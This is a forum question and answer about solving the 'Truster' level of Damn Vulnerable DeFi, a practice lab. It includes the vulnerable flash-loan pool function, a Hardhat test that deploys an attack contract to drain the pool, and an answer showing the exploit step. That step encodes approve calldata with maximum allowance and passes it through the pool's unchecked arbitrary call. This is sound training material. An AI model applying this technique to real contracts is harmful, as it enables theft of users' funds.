# solidity function functionCall from openzeppelin-contracts-accounts reverted

Tags: solidity, hardhat, openzeppelin, mocha, chai

I was calling flashLoan function using following parameters for hardhat testing

```
expect(
    await this.pool.flashLoan(100, attacker.address, this.token.address, 0x00)
).to.be.not.reverted;
```

---

This is the function written in solidity

```
function flashLoan(
        uint256 borrowAmount,
        address borrower,
        address target,
        bytes calldata data
    )
        external
        nonReentrant
    {
        uint256 balanceBefore = damnValuableToken.balanceOf(address(this));
        require(balanceBefore >= borrowAmount, "Not enough tokens in pool");
        
        damnValuableToken.transfer(borrower, borrowAmount);
        target.functionCall(data);

        uint256 balanceAfter = damnValuableToken.balanceOf(address(this));
        require(balanceAfter >= balanceBefore, "Flash loan hasn't been paid back");
    }
```

Click [HERE](https://github.com/Cache-and-Burn/damn-vulnerable-defi/blob/main/contracts/truster/TrusterLenderPool.sol) for Entire Solidity code

This is my entire test script

```
const { ethers } = require("hardhat");
const { expect } = require("chai");

describe("[Challenge] Truster", function () {
  let deployer, attacker;

  const TOKENS_IN_POOL = ethers.utils.parseEther("1000000");

  before(async function () {
    /** SETUP SCENARIO - NO NEED TO CHANGE ANYTHING HERE */
    [deployer, attacker] = await ethers.getSigners();

    const DamnValuableToken = await ethers.getContractFactory(
      "DamnValuableToken",
      deployer
    );
    const TrusterLenderPool = await ethers.getContractFactory(
      "TrusterLenderPool",
      deployer
    );

    this.token = await DamnValuableToken.deploy();
    this.pool = await TrusterLenderPool.deploy(this.token.address);

    await this.token.transfer(this.pool.address, TOKENS_IN_POOL);

    expect(await this.token.balanceOf(this.pool.address)).to.equal(
      TOKENS_IN_POOL
    );

    expect(await this.token.balanceOf(attacker.address)).to.equal("0");
    

  it("Flash load will successfull", async function () {
    /** CODE YOUR EXPLOIT HERE  */
   
    expect(
        await this.pool.flashLoan(100, attacker.address, this.token.address, 0x00)
    ).to.be.not.reverted;
  });

  it("Exploit", async function () {
    /** CODE YOUR EXPLOIT HERE  */
    this.hack = await (
      await ethers.getContractFactory("TrusterAttack", attacker)
    ).deploy(this.token.address, this.pool.address, attacker.address);

    this.hack.attack();
  });

  after(async function () {
    /** SUCCESS CONDITIONS */

    // Attacker has taken all tokens from the pool
    expect(await this.token.balanceOf(attacker.address)).to.equal(
      TOKENS_IN_POOL
    );
    expect(await this.token.balanceOf(this.pool.address)).to.equal("0");
  });
});
```

When i run this script it shows

**Error: VM Exception while processing transaction: reverted with reason string 'Address: low-level call failed'**

Noteed* basically i was trying to execute the flashLoan for https://www.damnvulnerabledefi.xyz/challenges/3.html

3. problem - Truster

Answer (score 3):

i was able to solve this.
the issue was functionCall requires a bytes String of an function.
So here i was in need of approve function byte string.

```
bytes memory data = abi.encodeWithSignature(
            "approve(address,uint256)", address(this), type(uint256).max
        );
```

So i passed this data as a parameter of target.functionCall(data)
Here target is the token address.

Noted bytes string of the data holds this value

0x095ea7b30000000000000000000000008464135c8f25da09e49bc8782676a84730c318bcffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff